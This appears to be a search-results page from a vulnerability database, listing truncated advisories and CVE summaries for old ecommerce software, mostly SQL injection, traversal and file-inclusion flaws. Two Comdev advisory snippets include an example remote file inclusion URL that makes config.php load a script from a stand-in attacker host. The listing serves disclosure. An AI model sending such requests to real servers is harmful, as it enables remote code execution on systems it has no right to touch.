2560 matches found
redhat Interchange
It seems that 'Red Hat Interchange' ecommerce and dynamic content management application is running in 'Inet' mode on this port. Versions 4.8.5 and earlier are flawed and may disclose contents of sensitive files to attackers. OpenVAS neither checked Interchange version nor tried to exploit the...
redhat Interchange
It seems that SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only Note: this service is not a web server, but it looks like it for findservice HEAD...
Unintentionally logging credit card transactions
Solar Designer of the Openwall Project reported a security vulnerability in the contributed authorizenet module which is part of the ecommerce package. Credit card information was being stored in a system log file. The system should not be saving this information. Versions affected Please check t...
phpshopSQL.txt
----------------------------------------------------- Nightmare TeAmZ Advisory 007 ------------------------------------------------------ Date - 10/2005 PhpShop Sql Injction AFFECTED PRODUCTS ================= PhpShop http://www.virtualdimensions.co.uk OVERVIEW ======== This is a great ecommerce...
[SA16903] Mall23 eCommerce "idOption_Dropdown_2" SQL Injection Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
CVE-2005-3039
SQL injection vulnerability in infopage.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idPage parameter...
CVE-2005-3043
SQL injection vulnerability in AddItem.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idOptionDropdown2 parameter...
CVE-2005-3039
CVE-2005-3039 describes an SQL injection in Mall23 eCommerce where the infopage.asp script processes the idPage parameter, enabling remote arbitrary SQL execution. The issue arises from improper handling of user-supplied input in the SQL query, consistent with the CVSS data indicating network acc...
CVE-2005-3043
SQL injection vulnerability in AddItem.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idOptionDropdown2 parameter...
CVE-2005-3039
SQL injection vulnerability in infopage.asp in Mall23 eCommerce allows remote attackers to execute arbitrary SQL commands via the idPage parameter...
CVE-2005-3043
Mall23 eCommerce is affected by a SQL injection in AddItem.asp, allowing remote attackers to inject arbitrary SQL via idOption_Dropdown_2. The issue has CVSS2 base score 7.5 (HIGH) with network/low complexity/unauthenticated access and partial impact on confidentiality, integrity, and availabilit...
[SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...
CVE-2005-2543
The CVE-2005-2543 entry describes a directory traversal vulnerability in Comdev eCommerce 3.0, specifically in wce.download.php, where the download parameter can be abused with a .. (dot dot) to download arbitrary files. Affected product/component: Comdev eCommerce 3.0 / wce.download.php. Root ca...
CVE-2005-2543
Directory traversal vulnerability in wce.download.php in Comdev eCommerce 3.0 allows remote attackers to download arbitrary files via a .. dot dot in the download parameter...
CVE-2005-2544
The CVE-2005-2544 entry concerns Comdev eCommerce 3.0, where a PHP remote file inclusion flaw in config.php allows an attacker to execute arbitrary PHP code via path[docroot]. This is evidenced by multiple sources (NVD/CVE records and a Nessus plugin) describing remote code execution possibilitie...
Comdev eCommerce 3.0 Multiple Vulnerabilities (RFI, Traversal)
The remote host is running eCommerce, a web-based shopping system from Comdev. The installed version of eCommerce allows remote attackers to control the 'pathdocroot' parameter used when including PHP code in the 'config.php' script. By leveraging this flaw, an attacker may be able to view...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
comdevTraversal.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script present in two locations can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example:...